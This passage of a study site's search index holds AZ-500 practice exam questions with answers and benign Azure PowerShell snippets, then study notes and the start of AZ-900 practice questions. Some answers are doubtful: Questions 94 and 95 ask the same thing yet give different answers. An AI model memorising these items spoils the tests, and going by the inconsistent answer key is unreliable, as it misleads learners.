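        # Route the KeyNearExpiry event from the vault to a webhook (for example, a Logic App or an Azure Function)\n$vault = Get-AzKeyVault -VaultName 'Vault1'\nNew-AzEventGridSubscription -ResourceId $vault.ResourceId -EventSubscriptionName 'key-near-expiry-alert' -Endpoint 'https://contoso.example/api/alert' -IncludedEventType 'Microsoft.KeyVault.KeyNearExpiry'\n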

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-67","title":"Question 67","text":"

        You have an Azure subscription that contains an Azure container registry named ACR1 and a user named User1. You need to ensure that User1 can administer images in ACR1. The solution must follow the principle of least privilege. Which two roles should you assign to User1? Each correct answer presents part of the solution. Select all answers that apply.

        • AcrDelete
        • AcrImageSigner
        • AcrPull
        • AcrPush
        • Contributor
        • Reader
        See response

        To administer images in ACR1, a user must be able to push and pull images to ACR1 and delete images from ACR1. The AcrPush and AcrDelete roles are required to push, pull, and delete images in ACR1. AcrPull only allows the pull image permission, not push. Contributor can also perform these operations; however, it also has many additional permissions, which means that it does not follow the principle of least privilege. Reader and AcrImageSigner do not have adequate permissions.
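
        A minimal sketch of the two assignments with Azure PowerShell (the user name and resource group are hypothetical):

        # Scope AcrPush and AcrDelete to the registry itself (least privilege; names are hypothetical)\n$acr = Get-AzContainerRegistry -ResourceGroupName 'RG1' -Name 'ACR1'\nNew-AzRoleAssignment -SignInName 'user1@contoso.com' -RoleDefinitionName 'AcrPush' -Scope $acr.Id\nNew-AzRoleAssignment -SignInName 'user1@contoso.com' -RoleDefinitionName 'AcrDelete' -Scope $acr.Id\n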

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-68","title":"Question 68","text":"

        You need to allow only Azure AD-authenticated principals to access an existing Azure SQL database. Which three actions should you perform? Each correct answer presents part of the solution. Select all answers that apply.

        • Add an Azure AD administrator.
        • Assign your account the SQL Security Manager built-in role.
        • Connect to the database by using Microsoft SQL Server Management Studio (SSMS).
        • Connect to the database by using the Azure portal.
        • Select\u00a0Support only Azure Active Directory authentication for this server.
        See response

        Adding an Azure AD administrator and assigning your account the SQL Security Manager built-in role are prerequisites for enabling Azure AD-only authentication. Selecting Support only Azure AD authentication for this server forces the Azure SQL logical server to use only Azure AD authentication. A connection to the data plane of the logical server is not needed.
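
        A hedged Azure PowerShell sketch of the server-side steps (the resource group, server name, and administrator display name are hypothetical):

        # Set an Azure AD administrator, then enforce Azure AD-only authentication on the logical server\nSet-AzSqlServerActiveDirectoryAdministrator -ResourceGroupName 'RG1' -ServerName 'sqlserver1' -DisplayName 'SQLAdmins'\nEnable-AzSqlServerActiveDirectoryOnlyAuthentication -ResourceGroupName 'RG1' -ServerName 'sqlserver1'\n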

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-69","title":"Question 69","text":"

        You manage Azure AD for a retail company. You need to ensure that employees using shared Android tablets can use passwordless authentication when accessing the Azure portal. Which authentication method should you use? Select only one answer.

        • the Microsoft Authenticator app
        • security keys
        • Windows Hello
        • Windows Hello for Business
        See response

        You can only use the Microsoft Authenticator app or one-time password login on shared devices. Windows Hello can only be used for Windows devices. You cannot use security keys on shared devices.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-70","title":"Question 70","text":"

        You need to configure passwordless authentication. The solution must follow the principle of least privilege. Which role should assign to complete the task? Select only one answer.

        • Authentication Administrator
        • Authentication Policy Administrator
        • Global Administrator
        • Security Administrator
        See response

        Configuring authentication methods requires Global Administrator privileges. Security administrators have permissions to manage other security-related features. Authentication policy administrators can configure the authentication methods policy, tenant-wide multi-factor authentication (MFA) settings, and password protection policy. Authentication administrators can set or reset any authentication methods, including passwords, for non-administrators and some roles.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-71","title":"Question 71","text":"

        You manage Azure AD. You disable the Users can register applications option in Azure AD. A user reports that they are unable to register an application. You need to ensure that the user can register applications. The solution must follow the principle of least privilege. What should you do? Select only one answer.

        • Assign the Application Developer role to the user.
        • Assign the Authentication Administrator role to the user.
        • Assign the Cloud App Security Administrator role to the user.
        • Enable the Users can register applications option.
        See response

        The Application Developer role has permissions to register an application even if the Users can register applications option is disabled. The Users can register applications option allows any user to register an application. The Authentication Administrator role and the Cloud App Security Administrator role do not follow the principle of least privilege.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-72","title":"Question 72","text":"

        You have a virtual network that contains an Azure Kubernetes Service (AKS) workload and an internal load balancer. Multiple virtual networks are managed by multiple teams. You are unable to change any of the IP addresses. You need to ensure that clients from virtual networks in your Azure subscription can access the AKS cluster by using the internal load balancer. What should you do? Select only one answer.

        • Create a private link endpoint on the virtual network and instruct users to access the cluster by using a private link endpoint on their virtual network.
        • Create a private link service on the virtual network and instruct users to access the cluster by using a private link endpoint in their virtual networks.
        • Create virtual network peering between the virtual networks to allow connectivity.
        • Create VPN site-to-site (S2S) connections between the virtual networks to allow connectivity.
        See response

        A private link service will allow access from outside the virtual network to an endpoint by using NAT. Since you do not control the IP addressing for other virtual networks, this ensures connectivity even if IP addresses overlap. Once a private link service is used in the load balancer, other users can create a private endpoint on virtual networks to access the load balancer.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-73","title":"Question 73","text":"

        You have an Azure subscription that contains a virtual machine named VM1. VM1 runs a web app named App1. You need to protect App1 by implementing Web Application Firewall (WAF). What resource should you deploy? Select only one answer.

        • Azure Application Gateway
        • Azure Firewall
        • Azure Front Door
        • Azure Traffic Manager
        See response

        WAF is a tier of Application Gateway. If you want to deploy WAF, you must deploy Application Gateway and select the WAF or WAF V2 tier.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-74","title":"Question 74","text":"

        You have an Azure AD tenant that uses the default setting. You need to prevent users from a domain named contoso.com from being invited to the tenant. What should you do? Select only one answer.

        • Deploy Azure AD Privileged Identity Management (PIM).
        • Edit the Access review settings.
        • Edit the Collaboration restrictions settings.
        • Enable security defaults.
        See response

        After you edit the Collaboration restrictions settings, invitations to users from blocked domains are rejected. Security defaults and PIM do not affect guest invitation privileges. By default, the Allow invitations to be sent to any domain (most inclusive) setting is enabled, in which case you can invite B2B users from any organization.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-75","title":"Question 75","text":"

        Your company has an Azure Active Directory (Azure AD) tenant named whizlab.com. The company wants to deploy a service named \u201cGetcloudskillsserver\u201d that would run on a virtual machine running Windows Server 2016. The service needs to authenticate to the tenant and access Microsoft Graph to read the directory data. You need to delegate the minimum required permissions for the service. Which of the following steps would you perform in Azure? Choose 3 answers from the options below.

        • Add an app registration.
        • Grant Application Permissions.
        • Add application permission.
        • Configure an Azure AD Application Proxy.
        • Add delegated permission.
        See response

        Correct: Add an app registration, grant Application permissions, and add application permission. Incorrect: Configure an Azure AD Application Proxy and add delegated permission. First, you need to add an application registration. When it comes to the types of permissions, you have to use application permissions for services (delegated permissions act on behalf of a signed-in user). Finally, you grant the required permissions.
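
        A minimal sketch of the registration step with Azure PowerShell (the display name comes from the question; granting Microsoft Graph application permissions is then done on the app registration):

        # Register the application and create its service principal\n$app = New-AzADApplication -DisplayName 'Getcloudskillsserver'\nNew-AzADServicePrincipal -ApplicationId $app.AppId\n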

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-76","title":"Question 76","text":"

        In order to get diagnostics from an Azure virtual machine you own, what is the first step?

        • A diagnostics agent needs to be installed on the VM
        • You need to create a storage account to store it
        • You need to grant RBAC\u00a0permissions to the user requesting diagnostics
        See response

        You need to create a storage account to store the diagnostics data.
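
        A hedged Azure PowerShell sketch (the storage account name, location, and diagnostics configuration path are hypothetical):

        # Create the storage account first, then enable the diagnostics extension on the VM (names and path are hypothetical)\nNew-AzStorageAccount -ResourceGroupName 'RG1' -Name 'diagstore123' -Location 'eastus' -SkuName 'Standard_LRS'\nSet-AzVMDiagnosticsExtension -ResourceGroupName 'RG1' -VMName 'VM1' -DiagnosticsConfigurationPath './diagnostics.json' -StorageAccountName 'diagstore123'\n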

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-77","title":"Question 77","text":"

        Being the network engineer at your company, you need to ensure that communications with Azure Storage pass through the Service Endpoint. How would you ensure it?

        • By adding an Inbound rule to allow access to the storage
        • By adding one Inbound rule and one Outbound rule
        • By adding an Outbound rule to allow access to the storage
        • You don't need to make a specific configuration or add any rule, it is automatically configured.
        See response

        By adding an Outbound rule to allow access to the storage. Inbound/outbound network security group rules can be created to deny traffic from/to the Internet and allow traffic from/to AzureCloud or other available service tags of particular Azure services.
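
        A minimal sketch of such a rule with Azure PowerShell, using the Storage service tag as the destination (the rule name and priority are arbitrary; the rule config would then be attached to an NSG with Add-AzNetworkSecurityRuleConfig):

        # Allow outbound traffic from the virtual network to the Azure Storage service tag\nNew-AzNetworkSecurityRuleConfig -Name 'Allow-Storage-Outbound' -Direction Outbound -Access Allow -Priority 100 -Protocol '*' -SourceAddressPrefix 'VirtualNetwork' -SourcePortRange '*' -DestinationAddressPrefix 'Storage' -DestinationPortRange '*'\n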

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-78","title":"Question 78","text":"

        You need to recommend a solution for encrypting data at rest and in transit for your company's database. Which of the following would you recommend?

        • Azure storage encryption
        • Transparent Data Encryption
        • Always Encrypted
        • SSL certificates
        See response

        Always Encrypted. Always Encrypted protects data both at rest and in transit, because data is encrypted on the client side and is never exposed as plaintext to the database engine. Azure storage encryption and Transparent Data Encryption only protect data at rest, and SSL certificates only protect data in transit.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-79","title":"Question 79","text":"

        A company wants to synchronize its on-premises Active Directory with its Azure AD tenant. They want to set up a solution that would minimize the need for additional hardware deployment. They also want to ensure that they can keep their current login restrictions. It includes logon hours for their current Active Directory users. Which authentication method should they implement?

        • Azure AD Connect and Pass-through authentication
        • Federated identity using Azure Directory Federation Services
        • Azure AD Connect and Password hash synchronization
        • Azure AD Connect and Federated authentication
        See response

        Azure AD Connect and Pass-through authentication. Since we need to minimize additional hardware deployments, we can use Azure AD Connect to synchronize Active Directory users with Azure AD. Pass-through authentication validates passwords directly against the on-premises Active Directory, so existing sign-in restrictions such as logon hours continue to apply, and unlike federation it requires no additional server infrastructure.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-80","title":"Question 80","text":"

        You must specify whether the following statement is TRUE or FALSE: You are an administrator at getcloudskills.com, responsible for managing user accounts in Azure Active Directory. In order to leverage Azure administrative units, you need an Azure Active Directory Premium license for each administrative unit member.

        • True
        • False
        See response

        False. To manage or use administrative units, you need an Azure Active Directory Premium license only for each administrative unit admin; unit members can use a free license.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-81","title":"Question 81","text":"

        A development team has published an application onto an Azure Web App service. They want to enable Azure AD authentication for the web application. They have to perform an application registration in Azure AD. Which of the following are required when you configure the App service for Azure AD authentication? Choose two answers from the options given below.

        • Client ID
        • Logout URL
        • Subscription ID
        • Tenant ID
        See response

        Client ID and Tenant ID

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-82","title":"Question 82","text":"

        You decide to use Azure Front Door for defining, managing, and monitoring the global routing for your web traffic and optimizing end-user reliability and performance via quick global failover. From the list below, choose the feature that is not supported by Azure Front Door.

        • Redirect HTTPS traffic to HTTP using URL redirect
        • Web Application Firewall
        • URL path-based routing
        See response

        Redirect HTTPS traffic to HTTP using URL redirect

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-83","title":"Question 83","text":"

        If no rules other than the default NSG rules are in place, are VMs on SubnetA and SubnetB able to connect to the Internet?

        • Yes
        • No
        See response

        Yes. The outbound rules contain a rule named \u201cAllowInternetOutBound\u201d, which allows all outbound traffic to the Internet.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-84","title":"Question 84","text":"

        Your company has a set of Azure SQL databases hosted on a logical server. They want to enable SQL auditing for the database. Which of the following can be used to store the audit logs? Choose 3 answers from the options given below.

        • Azure Log Analytics
        • Azure SQL database
        • Azure Event Hubs
        • Azure Storage accounts
        • Azure SQL data warehouse
        See response

        Azure Log Analytics, Azure Event Hubs and Azure Storage accounts
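
        A hedged Azure PowerShell sketch of enabling all three destinations at once (the resource names are hypothetical, and the $storageId, $ehRuleId, and $workspaceId variables are assumed to hold the target resource IDs):

        # Send server-level audit logs to a storage account, an event hub, and a Log Analytics workspace\nSet-AzSqlServerAudit -ResourceGroupName 'RG1' -ServerName 'sqlserver1' -BlobStorageTargetState Enabled -StorageAccountResourceId $storageId -EventHubTargetState Enabled -EventHubAuthorizationRuleResourceId $ehRuleId -LogAnalyticsTargetState Enabled -WorkspaceResourceId $workspaceId\n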

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-85","title":"Question 85","text":"

        Your organization is looking to increase its security posture. Which of the following would you implement to reduce the reliance on passwords and increase account security?

        • Entra ID B2C
        • Multi-factor Authentication (MFA)
        • Passwordless Authentication
        • Entra ID Directory Roles
        See response

        Multi-factor Authentication (MFA) and Passwordless Authentication. Multi-factor Authentication (MFA) enhances security by requiring two or more verification methods. Passwordless authentication allows users to sign in without a password, instead using methods like the Microsoft Authenticator app.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-86","title":"Question 86","text":"

        Which of the following is designed to ban certain passwords from being used, ensuring users avoid easily guessable and vulnerable passwords?

        • Entra ID Identity Protection
        • Entra ID Password Protection
        • Entra ID MFA
        • Entra ID B2B
        See response

        Entra ID Password Protection. Entra ID Password Protection helps you establish comprehensive defense against weak passwords in your environment. It bans certain passwords and sets lockout settings to prevent malicious attempts.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-87","title":"Question 87","text":"

        You're setting up an application to use Microsoft Entra ID for authentication. Which of the following are essential components you would need to create or configure in Microsoft Entra ID?

        • Application Registration
        • OAuth token grant
        • Azure Policy
        See response

        Application Registration and OAuth token grant. When you register an app with Microsoft Entra ID, you're creating an identity configuration for the app that allows it to integrate with the Entra ID identity service. A service principal is an identity created for use with applications, hosted services, and automated tools to access Azure resources.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-88","title":"Question 88","text":"

        You need to restrict access to your Azure Storage account such that it can only be accessed from a specific subnet within your Azure Virtual Network. Which feature should you utilize?

        • Private Link services
        • Virtual Network Service Endpoints
        • Azure Functions
        • Azure SQL Managed Instance
        See response

        Virtual Network Service Endpoints. Virtual Network Service Endpoints extend your virtual network private address space and the identity of your VNet to the Azure services, over a direct connection. Endpoints allow you to secure your critical Azure service resources to only your virtual networks.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-89","title":"Question 89","text":"

        Which of the following Azure services offer built-in Distributed Denial of Service (DDoS) protection to secure your applications?

        • Azure Firewall
        • Azure Application Gateway
        • Azure DDoS Protection Standard
        • Azure Front Door
        See response

        Azure Application Gateway, Azure DDoS Protection Standard, and Azure Front Door. Azure Application Gateway offers DDoS protection as part of its WAF (Web Application Firewall) feature. Azure DDoS Protection Standard provides advanced DDoS mitigation capabilities. Azure Front Door provides both DDoS protection and Web Application Firewall for its global HTTP/HTTPS endpoints.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-90","title":"Question 90","text":"

        You have been assigned to enhance the security and compliance of your organization's Azure SQL Database. Which of the following measures can you adopt to encrypt data and audit database operations?

        • Transparent Data Encryption (TDE)
        • Azure SQL Database Always Encrypted
        • Azure Blob Soft Delete
        • Enable database auditing
        See response

        Transparent Data Encryption (TDE) and Enable database auditing. Transparent Data Encryption (TDE) encrypts SQL Server, Azure SQL Database, and Azure Synapse Analytics data files. Database auditing tracks database events and writes them to an audit log in your Azure storage account.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-91","title":"Question 91","text":"

        You need to centralize the management of security configurations for multiple Azure subscriptions. Which Azure service should you utilize to ensure consistent application of configurations?

        • Entra ID
        • Azure Key Vault
        • Azure Blueprint
        • Azure Landing Zone
        See response

        Azure Blueprint. Azure Blueprint enables organizations to define a repeatable set of Azure resources that adheres to specific requirements and standards. It allows consistent application of configurations across multiple subscriptions.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-92","title":"Question 92","text":"

        You are an Azure security specialist who has been tasked with setting up and maintaining the security monitoring within the organization. Which of the following tasks can be accomplished with Microsoft Sentinel?

        • Monitor security events using Azure Monitor Logs
        • Automate response to specific security threats
        • Customize analytics rules to identify potential threats
        • Deploy virtual machines in Azure
        • Evaluate and manage generated alerts
        See response

        Monitor security events using Azure Monitor Logs, Automate response to specific security threats, Customize analytics rules to identify potential threats, and Evaluate and manage generated alerts. Microsoft Sentinel uses Azure Monitor Logs for security events, enabling users to monitor these events. Microsoft Sentinel offers automation features to respond to detected security threats. One of the features of Microsoft Sentinel is the ability to customize analytics rules, helping in the detection of potential threats. Microsoft Sentinel generates alerts based on its analytics, and users can evaluate and manage these alerts within the platform. Deploying virtual machines is a task within Azure and isn't specifically a function of Microsoft Sentinel.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-93","title":"Question 93","text":"

        You have a hybrid configuration of Azure Active Directory (Azure AD). You have an Azure HDInsight cluster on a virtual network. You plan to allow users to authenticate to the cluster by using their on-premises Active Directory credentials. You need to configure the environment to support the planned authentication. Solution: You deploy the On-premises data gateway to the on-premises network. Does this meet the goal?

        • Yes
        • No
        See response

        No.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-94","title":"Question 94","text":"

        Your company has an Azure subscription name Subscription1 that contains the users shown in the following table:

        • User1: Global Administrator
        • User2: Billing Administrator
        • User3: Owner
        • User4: Account Admin

        The company is sold to a new owner. The company needs to transfer ownership of Subscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        Select user:

        • User1
        • User2
        • User3
        • User4

        Select tool:

        • Azure Account Center
        • Azure Cloud Shell
        • Azure PowerShell
        • Azure Security Center
        See response

        User2. Azure Account Center.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-95","title":"Question 95","text":"

        Your company has an Azure subscription name Subscription1. Subscription1 is associated with the Azure Active Directory tenant that includes the users shown in the following table:

        • User1: Global Administrator
        • User2: Billing Administrator
        • User3: Owner
        • User4: Account Admin

        The company is sold to a new owner. The company needs to transfer ownership of Subscription1. Which user can transfer the ownership and which tool should the user use? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        Select user:

        • User1
        • User2
        • User3
        • User4

        Select tool:

        • Azure Account Center
        • Azure Cloud Shell
        • Azure PowerShell
        • Azure Security Center
        See response

        User1. Azure Account Center.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-96","title":"Question 96","text":"

        The CIS Microsoft Azure Foundations Security Benchmark provides several recommended best practices related to identify and access management. Each of the following is a best practice except for this one?

        • Avoid unnecessary guest user accounts in Azure Active Directory.
        • Enable Azure Multi-Factor Authentication (MFA).
        • Establish intervals for reviewing user authentication methods.
        • Enable Self-Service Group Management.
        See response

        Enable Self-Service Group Management.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-97","title":"Question 97","text":"

        You have an Azure Active Directory (Azure AD) tenant that contains the users shown in the following table.

        • User1: Member of Group1 and Group2; MFA status: Enabled
        • User2: Member of Group1; MFA status: Disabled

        You create and enforce an Azure AD Identity Protection sign-in risk policy that has the following settings:

        • Assignments: Include Group 1, exclude Group2
        • Conditions: Sign-in risk level: Low and above
        • Access: Allow access, Require multi-factor authentication.

        You need to identify what occurs when the users sign in to Azure AD. What should you identify for each user? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        When User1 signs in from an anonymous IP address, the user will:

        • Be blocked.
        • Be prompted for MFA.
        • Sign in by using a username and password only.

        When User2 signs in from an unfamiliar location, the user will:

        • Be blocked.
        • Be prompted for MFA.
        • Sign in by using a username and password only.
        See response

        User1 will be prompted for MFA. User2 will be blocked.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-98","title":"Question 98","text":"

        You have an Azure subscription that contains the virtual machines shown in the following table

        • VM1: East US, VNet1
        • VM2: West US, VNet2
        • VM3: East US, VNet1
        • VM4: West US, VNet3

        All the virtual networks are peered. You deploy Azure Bastion to VNet2. Which virtual machines can be protected by the bastion host?

        • VM1, VM2, VM3, and VM4.
        • VM1, VM2, and VM3 only.
        • VM2 and VM4 only.
        • VM2 only.
        See response

        VM1, VM2, VM3, and VM4.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-99","title":"Question 99","text":"

        You have an Azure subscription that contains the Azure virtual machines shown in the following table

        • VM1: Windows 10
        • VM2: Windows Server 2016
        • VM3: Windows Server 2019
        • VM4: Ubuntu Server 18.04 LTS

        You create an MDM Security Baseline profile named Profile1. You need to identify to which virtual machines Profile1 can be applied. Which virtual machines should you identify?

        • VM1, VM2, VM3, and VM4.
        • VM1, VM2, and VM3 only.
        • VM1 and VM3 only.
        • VM1 only.
        See response

        VM1 only.

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-exams/#question-100","title":"Question 100","text":"

        You have an Azure subscription named Sub1. You create a virtual network that contains one subnet. On the subnet, you provision the virtual machines shown in the following table.

        • VM1: NIC1; application security group Appgroup12; IP address 10.0.0.10
        • VM2: NIC2; application security group Appgroup12; IP address 10.0.0.11
        • VM3: NIC3; application security group Appgroup3; IP address 10.0.0.100
        • VM4: NIC4; application security group Appgroup4; IP address 10.0.0.200

        Currently, you have not provisioned any network security groups (NSGs). You need to implement network security to meet the following requirements:

        • Allow traffic to VM4 from VM3 only.
        • Allow traffic from the Internet to VM1 and VM2.
        • Minimize the number of NSGs and network security rules.

        How many NSGs and network security rules should you create? To answer, select the appropriate options in the answer area. NOTE: Each correct selection is worth one point.

        NSGs:

        • 1
        • 2
        • 3
        • 4

        **Network security rules:**

        • 1
        • 2
        • 3
        • 4
        See response

        NSGs: 2. Network security rules: 3.
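
        As a hedged sketch, the VM3-to-VM4 rule could be expressed with Azure PowerShell using the application security groups rather than IP addresses (the resource group, rule name, and priority are hypothetical):

        # Allow traffic to Appgroup4 only from Appgroup3; a lower-priority deny rule blocks everything else\n$asg3 = Get-AzApplicationSecurityGroup -ResourceGroupName 'RG1' -Name 'Appgroup3'\n$asg4 = Get-AzApplicationSecurityGroup -ResourceGroupName 'RG1' -Name 'Appgroup4'\nNew-AzNetworkSecurityRuleConfig -Name 'Allow-Appgroup3-to-Appgroup4' -Direction Inbound -Access Allow -Priority 100 -Protocol '*' -SourceApplicationSecurityGroup $asg3 -SourcePortRange '*' -DestinationApplicationSecurityGroup $asg4 -DestinationPortRange '*'\n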

        ","tags":["certification","cloud","azure","microsoft","az-500"]},{"location":"cloud/azure/az-500-keep-learning/","title":"AZ-500 Microsoft Azure Security Technologies Certificate - keep learning","text":"","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-keep-learning/#az-500-microsoft-azure-security-technologies-certificate-keep-learning","title":"AZ-500 Microsoft Azure Security Technologies Certificate: keep learning","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        In addition to completing the course work in the AZ-500 learning path, you should also be sure to read the following reference articles from Microsoft:

        • Manage Azure Active Directory groups and group membership
        • Configure Microsoft Entra Verified ID verifier
        • Block legacy authentication with Azure AD with Conditional Access
        • Microsoft Entra Permissions Management
        • What are access reviews?
        • Register an app with Azure Active Directory
        • Application and service principal objects in Azure Active Directory
        • Virtual network traffic routing
        • Azure SQL Database and Azure Synapse IP firewall rules
        • Networking considerations for App Service Environment
        • Create a virtual network for Azure SQL Managed Instance
        • Add and manage TLS/SSL certificates in Azure App Service
        • Observability in Azure Container Apps
        • Choose how to authorize access to blob data in the Azure portal
        • Authorize access to tables using Azure Active Directory
        • Choose how to authorize access to queue data in the Azure portal
        • Configure immutability policies for blob versions
        • Bring your own key details for Azure Information Protection
        • Enable infrastructure encryption for double encryption of data
        • Define and assign a blueprint in the portal
        • What is an Azure landing zone?
        • Dedicated HSM FAQ
        • Improve your regulatory compliance
        • Customize the set of standards in your regulatory compliance dashboard
        • Create custom Azure security initiatives and policies
        • Plan your Defender for Servers deployment
        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/","title":"AZ-500 Azure Security Engineer: Notes on the certification","text":"Sources of this notes
        • The Microsoft e-learn platform.
        • Book: \"Microsoft Certified - MCA Microsoft Certified Associate Azure Security Engineer Study Guide: Exam AZ-500.
        • Udemy course: AZ-500 Microsoft Azure Security Technologies Exam Prep.
        • Udemy course: Azure Security: AZ-500 (updated July 2023)
        Summary: AZ-500 Microsoft Azure Security Engineer Certification
        • About the certificate
        • I. Manage Identity and Access
        • II. Platform protection
        • III. Data and applications
        • IV. Security operations
        • AZ-500 and more: keep learning

        Cheatsheets: Azure-CLI | Azure PowerShell

        100 questions you should pass for the AZ-500 certificate

        These are some of the requirements for facing the AZ-500 highlighted by some experts:

        • Have previously taken the Azure Administrator: AZ-103/104 course.
        • A minimum of 1 year experience with Azure.
        • Understand concepts of virtual machines, resource groups and Azure AD.

        Since I only had two vouchers for Azure certifications in 2023 and had already spent one on the AZ-900, I focused on the AZ-500, but first I completed the AZ-104 training. These are my notes from that non-certified AZ-104 learning.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-500-preparation/#differences-between-the-az-500-and-the-sc-900-certification","title":"Differences between the AZ-500 and the SC-900 certification","text":"

        The Exam AZ-500: Microsoft Azure Security Technologies is focused on how an Azure security engineer implements, manages, and monitors security for resources in Azure, multi-cloud, and hybrid environments as part of an end-to-end infrastructure. This certification covers the security components and configurations needed to protect identity and access, data, applications, and networks.

        The Exam SC-900: Microsoft Security, Compliance, and Identity Fundamentals, by contrast, is targeted at those looking to familiarize themselves with the fundamentals of security, compliance, and identity (SCI) across cloud-based and related Microsoft services. This is a broad audience that may include business stakeholders, new or existing IT professionals, or students who have an interest in Microsoft security, compliance, and identity solutions.

        ","tags":["cloud","azure","az-500","course","certification"]},{"location":"cloud/azure/az-900-exams/","title":"Exams - Practice the AZ-900","text":"

        The AZ-900: Notes to get through the Azure Fundamentals Certificate and these Practice exams are derived from different sources.

        • Notes taken in: September 2023.
        • Certification accomplished on: September 23rd, 2023.
        • Practice tests: Practice tests from different sources.
        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#microsoft-platform","title":"Microsoft platform","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#practice-assessment-1","title":"Practice assessment 1","text":"","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-1-of-50","title":"Question 1 of 50","text":"

        Why is cloud computing often less expensive than on-premises datacenters? Each correct answer presents a complete solution.

        • You are only billed for what you use.

        Renting compute and storage services and being billed for only what you use often lowers operating expenses. Depending on the service and the type of network bandwidth, charges can be incurred. Cloud service offerings often provide functionality that can be difficult or cost-prohibitive to deploy on-premises, especially for smaller organizations. Major cloud providers offer services around the world, making it easy and relatively inexpensive to deploy services close to where your users reside. Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-2-of-50","title":"Question 2 of 50","text":"

        Select the answer that correctly completes the sentence. (------Your Answer Here -------)\u00a0refers to upfront costs incurred one time, such as hardware purchases.

        • Capital expenditures

        Capital expenditures are one-time expenses that can be deducted over time. Operational expenditures are billed as you use services and do not have upfront costs.

        Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-3-of-50","title":"Question 3 of 50","text":"

        Which cloud deployment model are you using if you have servers physically located at your organization\u2019s on-site datacenter, and you migrate a few of the servers to the cloud?

        • hybrid cloud

        A hybrid cloud is a computing environment that combines a public cloud and a private cloud by allowing data and applications to be shared between them.

        Describe cloud computing - Training | Microsoft Learn

        ","tags":["certification","cloud","azure","microsoft","az-900"]},{"location":"cloud/azure/az-900-exams/#question-4-of-50","title":"Question 4 of 50","text":"

        Select the answer that correctly completes the sentence.

        Increasing compute capacity for an app by adding RAM or CPUs to a virtual machine is called\u00a0(------Your Answer Here -------).

